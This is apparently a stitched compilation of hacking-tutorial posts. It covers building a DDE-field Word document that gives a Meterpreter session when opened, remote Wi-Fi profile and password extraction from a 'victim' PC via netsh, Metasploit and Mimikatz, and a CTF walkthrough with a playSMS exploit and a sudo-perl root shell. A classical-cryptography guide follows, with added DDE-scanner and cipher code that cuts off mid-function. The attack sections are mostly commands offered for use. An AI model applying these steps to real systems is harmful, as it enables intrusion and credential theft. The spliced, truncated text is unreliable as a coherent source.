Exploiting Windows Machine with DDE Exploit

DDE stands for “Dynamic Data Exchange”; it is a method Windows uses to let one program subscribe to an item created by another program. This exploit abuses that functionality on the victim endpoint. Once the victim opens the Word file, an HTA payload is retrieved over HTTP and a session is obtained.

Here is a step-by-step depiction of how it happens:
The code for the exploit has to be copied into Leafpad and saved with a “.rb” extension. You can name it anything you like; to avoid any confusion, ours is named “dde_delivery.rb”. This file now has to be moved into the windows section of the exploit folder in Metasploit; you can find the path and exploit URL below.


Path of the windows folder in Kali – /usr/share/metasploit-framework/modules/exploits/windows

Here is what the exploit being pasted into the “windows” folder will look like.


Now open a terminal and start Metasploit. Once it starts, type “use exploit/windows/dde_delivery” and the exploit will load. Once that is done, all you need to do is set srvhost, which is the host IP: type “set srvhost” followed by your IP; you can see what that looks like in the screenshot given below.
Press enter and you’re all set.
Type “exploit” and press Enter.
You will see a code generated, it has been highlighted in the screenshot given below. Copy this code.
NOTE: Do not close the terminal, it must remain active throughout.


Open Microsoft Word and navigate to the “Insert” tab. Under the “Text” section you will find “Quick Parts”; click on it and in the drop-down menu you will see “Field…”.


Click on “Field…”; another window will appear. By default it will look like the screenshot pasted below; click OK.


Once you click OK, the text “!Unexpected End of Formula” will appear. Select this text and right-click on it; in the menu choose the option “Toggle Field Codes”.


Once this is done, the text will change to “{ =\* MERGEFORMAT }”.


Paste the code you copied from Metasploit within the “{ }”, as seen below.


Save the file in a “.docx” format, you can name it anything you like and close Microsoft Word.

You now have a handy Word file that, when opened on a Windows 10 machine, gives you a session.
Here is what it looks like when the word file is opened:
Once the Word file is opened, you will see the following message; click “Yes”.


Next this message will appear. Again, click “Yes”.


Finally this message will appear; click “OK”.


Now go back to the terminal in Kali for the good part.
The moment OK is clicked in the image above, Meterpreter will come online and you will have a session, just like that!


In case you were wondering why, at the beginning, we made you copy the code into Leafpad manually and save it into Metasploit: this is a new exploit and had not yet been added to the Metasploit database.
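As an added defensive example (not part of the original post), this script reads a .docx as the zip container it is, pulls every Word field instruction out of word/document.xml, and flags the ones whose field name is DDE or DDEAUTO, the field type the Quick Parts steps above create. The sample XML body and its placeholder link text are constructed by me; the check matches only the literal field name, so it is a triage aid rather than a complete detector.

```python
import re
import zipfile
from xml.etree import ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Word's DDE field names. The field code is what Quick Parts > Field stores
# between the braces shown above, and Word resolves it when the file opens.
DDE_FIELD = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)


def field_instructions(document_xml):
    """Return every field instruction in a word/document.xml body.

    Simple fields keep the instruction in w:fldSimple/@w:instr; complex
    fields keep it in w:instrText runs between fldChar begin/end markers,
    and Word may split that text across several runs, so pieces are joined."""
    root = ET.fromstring(document_xml)
    found = [e.get(f"{{{W}}}instr", "") for e in root.iter(f"{{{W}}}fldSimple")]
    current = None
    for elem in root.iter():  # document order
        if elem.tag == f"{{{W}}}fldChar":
            kind = elem.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                current = []
            elif kind == "end" and current is not None:
                found.append("".join(current))
                current = None
        elif elem.tag == f"{{{W}}}instrText" and current is not None:
            current.append(elem.text or "")
    return found


def dde_fields(document_xml):
    """Instructions whose field name is DDE or DDEAUTO, whitespace trimmed."""
    return [i.strip() for i in field_instructions(document_xml) if DDE_FIELD.match(i)]


def scan_docx(path):
    """Open a .docx (a zip archive) and report the DDE field codes it carries."""
    with zipfile.ZipFile(path) as z:
        return dde_fields(z.read("word/document.xml"))


# Constructed sample body: one complex DDEAUTO field whose instruction is
# split across two runs, plus one harmless formula field that must not match.
SAMPLE_XML = f"""<w:document xmlns:w="{W}"><w:body><w:p>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText xml:space="preserve"> DDEAUTO </w:instrText></w:r>
  <w:r><w:instrText xml:space="preserve">constructed-placeholder-link</w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="separate"/></w:r>
  <w:r><w:t>!Unexpected End of Formula</w:t></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p><w:p>
  <w:fldSimple w:instr=" = 1 + 1 \\* MERGEFORMAT "><w:r><w:t>2</w:t></w:r></w:fldSimple>
</w:p></w:body></w:document>"""

if __name__ == "__main__":
    print(dde_fields(SAMPLE_XML.encode()))  # ['DDEAUTO constructed-placeholder-link']
```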
Have fun and stay ethical. 

Wifi Post Exploitation on Remote PC

Most of the security protocols of Wi-Fi networks are often broken or bypassed, exposing the wireless internet traffic to attackers. Through this article one can learn different ways to get the basic service set information of a remote user’s Wi-Fi as well as current network connection information, how to extract saved wireless LAN profiles from a remote PC, and after that how to disconnect the target user’s Wi-Fi. All the following attacks are post-exploitation attacks.
Table of Contents
  • Introduction
  • Working of Wi-Fi
  • Types of Wi-Fi security
  • WLAN BSS List
  • WLAN Current Connection
  • WLAN Profile
  • WLAN Disconnect
  • Mimikatz
  • Netsh

Introduction
All wireless networking technologies are commonly known as Wi-Fi. It provides high-speed internet as it works on radio waves. The Wi-Fi trademark is owned by the Wi-Fi Alliance; it is officially defined as a Wireless Local Area Network (WLAN). It is supported by many applications and devices such as mobile phones, PDAs, operating systems, video game consoles, etc.; therefore, it lets all these devices communicate easily.

Working of Wi-Fi
As the name suggests, a Wi-Fi network has no physical connection between sender and receiver. It uses radio frequencies within the part of the electromagnetic spectrum associated with radio waves; therefore, it is able to provide high-speed internet. Every Wi-Fi connection works through an Access Point (AP). The main job of an access point is to broadcast the signal that is then detected by electronic devices. Once the signal is detected, they connect to the access point in order to use the Wi-Fi.

Types of Wi-Fi security
  • Wired Equivalent Privacy
  • Wi-Fi Protected Access
  • Wi-Fi protected Access 2

Netsh
Now that you have a session on the victim’s PC, go to the shell and use the following command to find out the Wi-Fi connections the victim’s PC has used over time:


netsh wlan show profiles



Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine.
For example, this gives you the SSID and other important information about each wireless network.

msf > use post/windows/wlan/wlan_bss_list
msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit


As the above image shows, to date the PC has been connected to Pentest Lab, Sinos, POCO PHONE and ignit. Now we can use the following command to get detailed information about the networks:

netsh wlan show networks mode=bssid


Now use the following command to see the password of a particular Wi-Fi network:
netsh wlan show profile name="ignit" key=clear




Get current Wi-Fi connection information of a remote user
This module gathers information about the current connection on each wireless lan interface on the target machine.
msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection
msf post(wlan_current_connection) > set session 5
msf post(wlan_current_connection) > run


Get saved wireless LAN profile of a remote user
This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.
msf post(wlan_current_connection) > use post/windows/wlan/wlan_profile
msf post(wlan_profile) > set session 5
msf post(wlan_profile) > exploit



Disconnect a remote user’s Wi-Fi connection
This module disconnects the current wireless network connection on the specified interface.
msf > use post/windows/wlan/wlan_disconnect
msf post(wlan_disconnect) > set session 5
msf post(wlan_disconnect) > exploit


Other Way
Mimikatz is the other way. I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.
meterpreter > load kiwi


meterpreter > help
This gives you the entire wireless connection list, with passwords as well. Voilà! You got it right.
meterpreter > wifi_list
meterpreter > wifi_list_shared



Hack the Dina VM (CTF Challenge)


Today we are going to take on another CTF challenge, Dina. The credit for making this VM goes to “Touhid Shaikh”; it is a boot2root challenge where we have to root the server and capture the flag to complete it. You can download this VM here.
Security Level: Beginner
Penetrating Methodology:
1.      Scanning
·         Netdiscover
·         NMAP
2.      Enumeration
·         NMAP
·         Web Directory search 
3.      Exploitation
·         Metasploit
4.      Privilege Escalation
·         Exploiting Sudo rights

Walkthrough: 

Scanning:

Let’s start off by scanning the network and identifying the host IP address. We can identify our host IP as 192.168.43.219 by using Netdiscover.
netdiscover
Then, as usual, we used our favourite tool Nmap for port enumeration. We found that port 80 is open.
nmap -A 192.168.43.219

Enumeration:
As we can see port 80 is open, so we tried to open the IP address in our browser, but we didn’t find anything useful on the webpage.

Also, in the nmap scan we found the robots.txt file, so we tried to open it in the browser.

Inside robots.txt we found the names of multiple directories, so we tried to open each one of them one by one, but only the /nothing directory was useful to us.

The source code of the /nothing directory revealed some passwords which were useful later.

Now that we had the passwords, we used dirb to find any further directories where we could use them. We found a directory named /secure.
dirb http://192.168.43.219

In the /secure directory there is a zip file named backup.zip. We downloaded the file to our Kali machine.

When we tried to extract the zip file it was password protected, so we tried all the passwords found above, and freedom was the correct one.

After extracting the file we found an mp3 file. We checked the file type and found out it is actually an ASCII text file. We opened it and got a username, touhid, and the name of a directory, /SecreTgatwayLogin.
file backup-cred.mp3
cat backup-cred.mp3

We opened the directory in the browser and got a playSMS login page. We put in the username touhid and tried the passwords from the list found above; diana worked for us.


Exploitation:
In the exploitation phase we looked for any exploit for the playSMS web application in Metasploit and found two exploits.
search playsms

We used the second exploit, which uploads our payload using a CSV file.
We put in the required fields and used touhid and diana as username and password.
use exploit/multi/http/playsms_uploadcsv_exec
set rhost 192.168.43.219
set lhost 192.168.43.171
set lport 4444
set username touhid
set password Diana
set targeturi /SecreTgatwayLogin
exploit


After running the exploit, we successfully got a meterpreter session and then used a Python one-liner to get a proper shell.
On checking the sudo permissions for the www-data user, we found it had permission to run perl via sudo.
getuid
shell
python -c 'import pty; pty.spawn("/bin/sh")'
sudo -l

Privilege Escalation:
To elevate to root privileges we exploited the sudo permission on perl and got a root shell. We then moved to the root directory and found the flag.txt file.
sudo /usr/bin/perl -e 'exec "/bin/sh"'
whoami
cd /root
ls
cat flag.txt




Beginner Guide to Classic Cryptography

Cryptography: It is a technique of scrambling a message using mathematical logic to keep the information secure. It protects the scrambled message from being read by an attacker when it is transported over an insecure network, since it converts the readable message into unreadable text.

Plaintext: It is the data, in readable form, that needs to be shared over an insecure network.
Encryption key: It is a random string of bits created specifically to scramble the plaintext into unreadable text using mathematical logic. There are two types of encryption key: symmetric key and asymmetric key.

Cipher text: The output of encryption is cipher text, which is not readable by human beings.

Decryption key: It is the key used to decipher the cipher text back into plaintext, using the symmetric or asymmetric key, to read the original message.
Functionality of a cryptosystem

·         Authentication: It is the process of verifying the identity of a valid person, through a username and password, who communicates over a network.
·         Authorization: It refers to the process of granting or denying access to a network resource or service. Most of the computer security systems that we have today are based on a two-step mechanism. The first step is authentication, and the second step is authorization or access control, which allows the user to access various resources based on the user’s identity.
·         Confidentiality or privacy: It means the assurance that only authorized users can read or use confidential information. When cryptographic keys are used on plaintext to create cipher text, privacy is assigned to the information.
·         Integrity: Integrity is the security aspect that confirms that the original contents of information have not been altered or corrupted. There should not be any kind of modification of the information while it is transported over the network.
·         Non-repudiation: Non-repudiation makes sure that each party is accountable for the messages it sent. Without it, someone can communicate and later falsely deny the communication entirely, claim that it occurred at a different time, or even deny receiving a piece of information.

Types of classical cryptographic algorithms
Caesar cipher
The Caesar cipher is a type of substitution cipher in which each letter of the alphabet is replaced by the letter a fixed distance away from it.
Algorithm
Step 0: Mathematically, map the letters to numbers (i.e., A = 1, B = 2, and so on).


Step 1: Select an integer key K between 1 and 25 (there are 26 letters in the English alphabet). Let us say we shift right by 3 letters, so A + 3 = D, B + 3 = E and so on.


Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k) % 26.
For example, encryption of “IGNITE” looks like this:
C = E (L+K) %26
Here L= I and K = 3
C = E (I+3) % 26
C = E (9+3) % 26
C = E (12) % 26
C = E (L)
Hence encryption of IGNITE: LJQLWH


Step 3: The deciphering formula is “Subtract k mod 26”; that is, the encrypted letter L becomes (L - k) % 26.
For example, decryption of “LJQLWH” looks like this:
C = D (L-K) %26
C = D (L-3) % 26
C = D (12-3) % 26
C = D (9) % 26
C = D (I)
Hence decryption of LJQLWH: IGNITE

Limitation: Caesar cipher is vulnerable to brute-force attack because it depends on a single key with 25 possible values if the plaintext is written in English. Consequently, by trying each option and checking which one results in a meaningful word, it is possible to find out the key. Once the key is found, the full cipher text can be deciphered accurately.
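Steps 0 to 3 and the brute-force attack from the Limitation as an added example; this is my code, not the article's. It numbers letters from A = 0 rather than A = 1, which gives the same shifted letter mod 26.

```python
import string

# A=0 ... Z=25 here; the article numbers A as 1, and the shift result is the same
ALPHABET = string.ascii_uppercase


def caesar_encrypt(plaintext, k):
    """Step 2: C = (L + k) mod 26 for each letter; other characters pass through."""
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + k) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(ciphertext, k):
    """Step 3: P = (L - k) mod 26, i.e. encryption with the negated key."""
    return caesar_encrypt(ciphertext, -k)


def caesar_brute_force(ciphertext):
    """The attack from the Limitation: try all 25 keys and return
    {key: candidate plaintext}; a reader (or a dictionary check) picks the
    candidate that is a meaningful word."""
    return {k: caesar_decrypt(ciphertext, k) for k in range(1, 26)}


if __name__ == "__main__":
    ct = caesar_encrypt("IGNITE", 3)
    print(ct)                               # LJQLWH
    print(caesar_decrypt(ct, 3))            # IGNITE
    for k, guess in caesar_brute_force(ct).items():
        print(k, guess)                     # key 3 yields IGNITE
```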

Monoalphabetic Cipher

It is also a type of substitution cipher, in which each letter of the alphabet is replaced using some permutation of the letters of the alphabet. Hence the number of permutations of 26 letters is 26! (the factorial of 26), which is about 4×10^26. This technique uses a random substitute for every single letter, which makes the monoalphabetic cipher secure against brute-force attack.

The sender and the receiver decide on a randomly selected permutation of the letters of the alphabet. For example, in the word “HACKING” replace G with “J” and N with “W”; hence the permutation key is 2!, i.e. the factorial of 2, and HACKING will become “HACKJIW”.

Algorithm
Step 0: Generate plaintext/cipher text pairs by mapping each plaintext letter to a different random cipher text letter: IJKLQR--------GFE.


Step 1: To encipher, for each letter in the original text, replace the plaintext letter with a cipher text letter.
Hence encryption of “IGNITE” will be as shown below:


Step 2: For deciphering, reverse the procedure in step 1.
Hence decryption of “USBUOQ” will be “IGNITE”.

Limitations
Despite its advantages, the random key for each letter in monoalphabetic substitution has some downsides too. It is very difficult to remember the order of the letters in the key, and therefore, it takes a lot of time and effort to encipher or decipher the text manually. Monoalphabetic substitution is vulnerable to frequency analysis.
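An added example for steps 0 to 2 and the frequency-analysis limitation; this is my code, not the article's. The substitution alphabet is a constructed permutation chosen so that the article's IGNITE -> USBUOQ holds (the article's own table is only in an image), and the sample sentence is constructed with many E's, as real English text has.

```python
from collections import Counter
import string

PLAIN = string.ascii_uppercase
# Constructed permutation key (not the article's table): plaintext letter
# PLAIN[i] is replaced by CIPHER[i]. Chosen so that IGNITE -> USBUOQ.
CIPHER = "MKXHQZSCUVDWABPRLYGOJFNTIE"
assert sorted(CIPHER) == list(PLAIN)  # a valid permutation of the alphabet

ENC = dict(zip(PLAIN, CIPHER))   # step 0: the plaintext/cipher text pairs
DEC = dict(zip(CIPHER, PLAIN))   # step 2: the same table, reversed


def mono_encrypt(plaintext):
    """Step 1: replace each letter by its cipher text letter."""
    return "".join(ENC.get(ch, ch) for ch in plaintext.upper())


def mono_decrypt(ciphertext):
    return "".join(DEC.get(ch, ch) for ch in ciphertext.upper())


def letter_frequencies(text):
    """Letter counts, most common first: the input to frequency analysis."""
    return Counter(ch for ch in text.upper() if ch in PLAIN).most_common()


def guess_most_common(ciphertext, expected="E"):
    """First step of frequency analysis: assume the most frequent cipher text
    letter stands for the most frequent English letter and return that pair.
    The permutation being random does not help: the letter frequencies of
    the plaintext survive the substitution unchanged."""
    top_letter, _ = letter_frequencies(ciphertext)[0]
    return top_letter, expected


if __name__ == "__main__":
    print(mono_encrypt("IGNITE"))                  # USBUOQ
    print(mono_decrypt("USBUOQ"))                  # IGNITE
    # constructed sample with many E's
    sample = "WE NEED TO MEET THE ENEMY BEFORE THE EVENING ENDS"
    ct = mono_encrypt(sample)
    print(guess_most_common(ct))                   # ('Q', 'E')
    print(DEC["Q"])                                # E: the guess is right
```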

Playfair Cipher

It encrypts digraphs, or pairs of letters, rather than single letters like the plain substitution cipher.
In this cipher a 5x5 grid of letters is created which contains 25 letters instead of 26; one letter, “J” (or any other), is omitted. One first fills in the spaces in the table with the letters of the keyword (dropping any duplicate letters), then fills the remaining spaces with the rest of the letters of the alphabet in order. If the plaintext contains J, it is replaced by I.

Algorithm
Step 0: Split the plaintext into pairs; if the number of letters is odd, add “X” after the last letter of the plaintext.
For example, if “TABLE” is our plaintext, split it into pairs as: TA BL EX
Step 1: Set up the 5 × 5 matrix by filling the first positions with the key, then fill the rest of the matrix with the other letters. Let us assume “ARTI” is our key for encryption.


Step 2: Encryption involves three rules:
(1)    If both letters fall in the same row, substitute each with the letter to its right, wrapping around at the end of the row. TA-----> IR


(2)    If the letters fall in different rows and columns, form a rectangle with the two letters and take the letters on the horizontally opposite corners of the rectangle. BL-----> TN


(3)    If both letters fall in the same column, substitute each letter with the letter below it, wrapping around at the bottom of the column. EX-----> LT


Hence encryption of the word “TABLE” is “IR TN LT”.
Step 3: For decryption the receiver uses the same key to decipher the text by reversing the three rules used in step 2.

Limitations:
Playfair is considerably harder to break, but it is still vulnerable to frequency analysis; in the case of Playfair, frequency analysis is applied to the 25*25 = 625 possible digraphs rather than the 25 possible monographs (single letters) of the monoalphabetic cipher.
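The whole Playfair procedure (steps 0 to 3) as an added example; it is my code, not the article's. Assumptions: J is merged into I, and a pair of identical letters is split with an X, a standard Playfair rule the steps above do not mention.

```python
def playfair_table(key):
    """Step 1: 5x5 table, key letters first (duplicates dropped, J merged
    into I), then the rest of the alphabet in order."""
    seen = []
    for ch in (key.upper() + "ABCDEFGHIKLMNOPQRSTUVWXYZ").replace("J", "I"):
        if ch.isalpha() and ch not in seen:
            seen.append(ch)
    return [seen[i:i + 5] for i in range(0, 25, 5)]


def position(table, ch):
    for r, row in enumerate(table):
        if ch in row:
            return r, row.index(ch)
    raise ValueError(f"{ch!r} is not in the table")


def digraphs(text):
    """Step 0: letters only, J -> I, pad an odd tail with X. Two identical
    letters in one pair also get an X between them (standard rule, assumed)."""
    letters = [c for c in text.upper().replace("J", "I") if c.isalpha()]
    pairs, i = [], 0
    while i < len(letters):
        a = letters[i]
        b = letters[i + 1] if i + 1 < len(letters) else "X"
        if a == b:
            b = "X"
            i += 1
        else:
            i += 2
        pairs.append(a + b)
    return pairs


def playfair(text, key, decrypt=False):
    """Steps 2 and 3: apply the three rules; decrypt=True reverses the row and
    column shifts (the rectangle rule is its own inverse)."""
    t = playfair_table(key)
    d = -1 if decrypt else 1
    out = []
    for a, b in digraphs(text):
        (ra, ca), (rb, cb) = position(t, a), position(t, b)
        if ra == rb:     # same row: shift right (left when decrypting), wrapping
            out.append(t[ra][(ca + d) % 5] + t[rb][(cb + d) % 5])
        elif ca == cb:   # same column: shift down (up when decrypting), wrapping
            out.append(t[(ra + d) % 5][ca] + t[(rb + d) % 5][cb])
        else:            # rectangle: keep each letter's row, take the other's column
            out.append(t[ra][cb] + t[rb][ca])
    return "".join(out)


if __name__ == "__main__":
    for row in playfair_table("ARTI"):
        print(" ".join(row))
    print(playfair("TABLE", "ARTI"))                 # IRTNLT
    print(playfair("IRTNLT", "ARTI", decrypt=True))  # TABLEX
```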

Polyalphabetic Cipher

A polyalphabetic substitution cipher is a series of simple substitution ciphers: each character of the plaintext is substituted using an alphabet that changes with the position of the character. The Vigenère cipher is a special case of the polyalphabetic cipher.

Algorithm
Step 0: Decide on an encryption key to change plaintext into cipher text; for example take “HACKING” as the encryption key, whose numerical representation is “7, 0, 2, 10, 8, 13, 6”.


Step 1: To encrypt, the number of the first letter of the key encrypts the first letter of the plaintext, the number of the second letter of the key encrypts the second letter of the plaintext, and so on; the key repeats once its letters are used up.
For example, the plaintext is “VISIT TO HACKING ARTICLES” and the key is “HACKING: 7 0 2 10 8 13 6”.


Step 2: The encryption formula is “Add k mod 26”; that is, the original letter L becomes (L + k) % 26.
C = E (L+K) %26
Here L=V and K =7
C = E (V+7) %26
C = E (21+7) %26
C = E (28) %26
C = E (2)
C = E (C)
Hence encryption of “VISIT TO HACKING ARTICLES” is “CIUSBGUOAEUQAMHRVSKYKZ”


Step 3: The deciphering formula is “Subtract k mod 26”; that is, the encrypted letter L becomes (L - k) % 26.
For example, decryption of “CIUSBGUOAEUQAMHRVSKYKZ” looks like this:
C = D (L-K) %26
Here L=C and K =7
C = D (C-7) %26
C = D (2-7) %26
C = D (-5) %26
C = D (21)
C = D (V)
Hence decryption of “CIUSBGUOAEUQAMHRVSKYKZ” is “VISIT TO HACKING ARTICLES”

Limitation
The main limitation of the Vigenère cipher is the repeating nature of its key. If a cryptanalyst correctly estimates the length of the key, the cipher text can be treated as a set of interleaved Caesar ciphers, each of which can easily be broken separately.
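The Vigenère steps 0 to 3 and the Limitation as an added example (my code, not the article's). Letters are numbered from A = 0, spaces are dropped as in the article's cipher text, and the last function shows why a known key length matters: it slices the cipher text into seven columns, each of which is a Caesar cipher under a single key letter.

```python
A = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def key_numbers(key):
    """Step 0: HACKING -> [7, 0, 2, 10, 8, 13, 6] (A = 0)."""
    return [A.index(ch) for ch in key.upper()]


def vigenere(text, key, decrypt=False):
    """Step 2: C = (L + k_i) mod 26; step 3: P = (C - k_i) mod 26.
    The key repeats across the letters; spaces are dropped as in the article."""
    ks = key_numbers(key)
    letters = [c for c in text.upper() if c in A]
    out = []
    for i, ch in enumerate(letters):
        k = ks[i % len(ks)]
        shift = -k if decrypt else k
        # Python's % keeps the result in 0..25 even when L - k is negative,
        # e.g. (2 - 7) % 26 == 21, which is V
        out.append(A[(A.index(ch) + shift) % 26])
    return "".join(out)


def caesar_columns(ciphertext, period):
    """The Limitation above: once the key length (period) is known, the letters
    at positions i, i+period, i+2*period, ... were all shifted by the same key
    letter, so each such column is a plain Caesar cipher on its own."""
    return [ciphertext[i::period] for i in range(period)]


if __name__ == "__main__":
    ct = vigenere("VISIT TO HACKING ARTICLES", "HACKING")
    print(ct)                                      # CIUSBGUOAEUQAMHRVSKYKZ
    print(vigenere(ct, "HACKING", decrypt=True))   # VISITTOHACKINGARTICLES
    cols = caesar_columns(ct, 7)
    # column 0 was shifted only by H (7): a Caesar cipher with key 7
    print(cols[0], vigenere(cols[0], "H", decrypt=True))   # COHZ VHAS
```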

Rotation cipher
The rotation cipher generates cipher text from a block size and an angle of rotation applied to the plaintext, using one of the following angles: 90°, 180° and 270°.

Algorithm
Step 0: Decide the size of block for plaintext “CRYPTOGRAPHY”, let assume 6 as block size for it.

CRYPTO
GRAPHY

Step 1: For encryption, arrange the plaintext in any direction among the angles 90°, 180° and 270°, as shown below:
·         In a 90° rotation, place the starting letters vertically downwards, from G to C and so on.

CRYPTO
GRAPHY

·         In a 180° rotation, place the letters horizontally from right to left, from O to C and so on.

CRYPTO
OTPYRC
GRAPHY
YHPARG

·         In a 270° rotation, place the last letters vertically from top to bottom, from O to Y and so on.
CRYPTO
GRAPHY

Hence the cipher text will be arranged in the following ways:



Step 2: Read the letters according to the angle of rotation:
90° rotated cipher text “GCRRAYPPHTYO”
180° rotated cipher text “YHPARGOTPYRC”
270° rotated cipher text “OYTHPPYARRCG”

Step 3: For decryption, any of the above three cipher texts can be decrypted using the block size and the angle of rotation.
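The rotation cipher of steps 0 to 3 as an added example, not from the article. It assumes the plaintext is padded with X to a multiple of the block size so every row is full, and it reads the 90°, 180° and 270° grids in the order the three cipher texts above show; decryption rebuilds the grid and rotates it the other way.

```python
def blocks(text, size):
    """Step 0: drop non-letters and split the plaintext into rows of `size`
    letters, padding the last row with X so every row is full (assumption)."""
    text = "".join(c for c in text.upper() if c.isalpha())
    if len(text) % size:
        text += "X" * (size - len(text) % size)
    return [text[i:i + size] for i in range(0, len(text), size)]


def rotate(rows, angle):
    """Steps 1-2: read the grid after rotating it by 90, 180 or 270 degrees.
    90:  columns read bottom to top, left to right   (G C, R R, A Y, ...)
    180: rows taken bottom to top, each read right to left (Y H P A R G ...)
    270: columns read top to bottom, right to left   (O Y, T H, P P, ...)"""
    width = len(rows[0])
    if angle == 90:
        return "".join(row[c] for c in range(width) for row in reversed(rows))
    if angle == 180:
        return "".join(row[::-1] for row in reversed(rows))
    if angle == 270:
        return "".join(row[c] for c in range(width - 1, -1, -1) for row in rows)
    raise ValueError("angle must be 90, 180 or 270")


def rotation_encrypt(plaintext, block_size, angle):
    return rotate(blocks(plaintext, block_size), angle)


def rotation_decrypt(ciphertext, block_size, angle):
    """Step 3: knowing the block size and angle, rebuild the grid the cipher
    text was read from and rotate it the opposite way."""
    if angle == 180:
        return rotate(blocks(ciphertext, block_size), 180)
    # for 90 and 270 the cipher text was read column by column, so it splits
    # into block_size chunks of n_rows letters; each chunk is one column
    n_rows = len(ciphertext) // block_size
    cols = [ciphertext[i:i + n_rows] for i in range(0, len(ciphertext), n_rows)]
    return rotate(cols, 360 - angle)


if __name__ == "__main__":
    for angle in (90, 180, 270):
        ct = rotation_encrypt("CRYPTOGRAPHY", 6, angle)
        print(angle, ct, rotation_decrypt(ct, 6, angle))
```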

Transposition cipher
In a transposition cipher the plaintext letters are rearranged, without replacing any original letter with another as the cipher techniques above do.

Algorithm

Step 0: Decide on the keyword; its length gives the number of columns of the table that stores the plaintext and helps generate the cipher text. Let us suppose we choose CIPHER as the key.
Step 1: Store the plaintext “classical cryptography” in the table, filling the cells from left to right.




Step 2: For encryption, read the columns in ascending alphabetical order of the keyword’s letters; for “CIPHER” this order is CEHIPR:



Column 1: CCCPP
Column 2: ESRR
Column 3: HSCG
Column 4: PALOY
Column 5: RIYA
Hence the cipher text obtained will be “CCCPPESRRHSCGPALOYRIYA”.
Step 3: For decryption, the receiver uses the key to rearrange the 26 cipher letters back into their columns in a 6*5 matrix.

Limitation
It is very easy to rearrange the cipher letters if the correct key is guessed.
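The columnar transposition of steps 0 to 3 as an added example; this is my code, not the article's. The listing above writes each key letter in front of its column; the code returns plaintext letters only, so the I column (L A T H) appears in the output too. Decryption recomputes each column's length from the text length, which is what makes step 3 work when the last row is short.

```python
from math import ceil


def column_order(keyword):
    """Step 2: columns are read in alphabetical order of the key letters.
    CIPHER -> C E H I P R -> column indexes [0, 4, 3, 1, 2, 5]."""
    return sorted(range(len(keyword)), key=lambda i: (keyword[i], i))


def fill_table(plaintext, width):
    """Step 1: write the letters row by row into a table `width` columns wide."""
    letters = "".join(c for c in plaintext.upper() if c.isalpha())
    return [letters[i:i + width] for i in range(0, len(letters), width)]


def columnar_encrypt(plaintext, keyword):
    rows = fill_table(plaintext, len(keyword))
    out = []
    for c in column_order(keyword):
        out.append("".join(row[c] for row in rows if c < len(row)))
    return "".join(out)


def columnar_decrypt(ciphertext, keyword):
    """Step 3: recompute each column's length from the text length, cut the
    cipher text into those columns in key order, then read the table by rows."""
    width = len(keyword)
    n_rows = ceil(len(ciphertext) / width)
    full = len(ciphertext) % width or width   # leftmost columns hold n_rows letters
    lengths = [n_rows if c < full else n_rows - 1 for c in range(width)]
    cols, pos = [""] * width, 0
    for c in column_order(keyword):
        cols[c] = ciphertext[pos:pos + lengths[c]]
        pos += lengths[c]
    plain = []
    for r in range(n_rows):
        for c in range(width):
            if r < len(cols[c]):
                plain.append(cols[c][r])
    return "".join(plain)


if __name__ == "__main__":
    for row in fill_table("classical cryptography", 6):
        print(" ".join(row))
    ct = columnar_encrypt("classical cryptography", "CIPHER")
    print(ct)                                  # CCPPSRRSCGLATHALOYIYA
    print(columnar_decrypt(ct, "CIPHER"))      # CLASSICALCRYPTOGRAPHY
```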

Rail fence cipher

The 'rail fence cipher', also called a zigzag cipher, is a form of transposition cipher: the plaintext is written downwards and diagonally on successive "rails" of an imaginary fence, then moving up when the bottom rail is reached.

Algorithm
Step 0: Choose the number of rails, which acts as the key for plotting the plaintext. Here 3 rails is chosen as the key for encryption.
Step 1: Plot the plaintext “RAJ CHANDEL” on the rails in zigzag form, going top to bottom (downwards and diagonally) and then bottom to top (upwards and diagonally).



Step 2: For encryption, read all the letters horizontally, starting from row 1 to row 3:
Row 1: RHE
Row 2: ACADL
Row 3: JN
Hence encryption of “RAJCHANDEL” is “RHEACADLJN”.

Step 3: For decryption, generate the matrix by multiplying the total cipher text length by the number of rails; here the cipher text “RHEACADLJN” has 10 letters and there are 3 rails, hence the matrix will be 10*3.

Reverse the rule used in encryption and place the cipher text as:

Row 1: RHE


Row 2: ACADL


Row 3: JN


Limitations
The rail fence cipher is not very strong; the number of practical keys (the number of rails) is small enough that a cryptanalyst can try them all by hand.
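Steps 0 to 3 and the Limitation as an added example; this is my code, not the article's. Decryption recomputes how many letters fall on each rail from the zigzag pattern (the 10*3 matrix step done arithmetically), and the last function tries every rail count, which is the small key space the Limitation describes.

```python
def rail_pattern(length, rails):
    """Rail index of each plaintext position in the zigzag:
    0,1,2,1,0,1,2,1,0,1 for 3 rails and 10 letters."""
    if rails < 2:
        raise ValueError("need at least 2 rails")
    cycle = 2 * (rails - 1)
    return [min(i % cycle, cycle - i % cycle) for i in range(length)]


def rail_fence_encrypt(plaintext, rails):
    """Steps 1-2: drop spaces, plot the letters on the rails in zigzag order,
    then read each rail from top to bottom. Returns (rows, cipher text)."""
    letters = "".join(c for c in plaintext.upper() if c.isalpha())
    pattern = rail_pattern(len(letters), rails)
    rows = ["".join(ch for ch, r in zip(letters, pattern) if r == rail)
            for rail in range(rails)]
    return rows, "".join(rows)


def rail_fence_decrypt(ciphertext, rails):
    """Step 3: the zigzag for this length says how many letters each rail
    holds, so cut the cipher text into rails and walk the zigzag again,
    taking the next letter from whichever rail the walk is on."""
    pattern = rail_pattern(len(ciphertext), rails)
    rows, pos = [], 0
    for rail in range(rails):
        n = pattern.count(rail)
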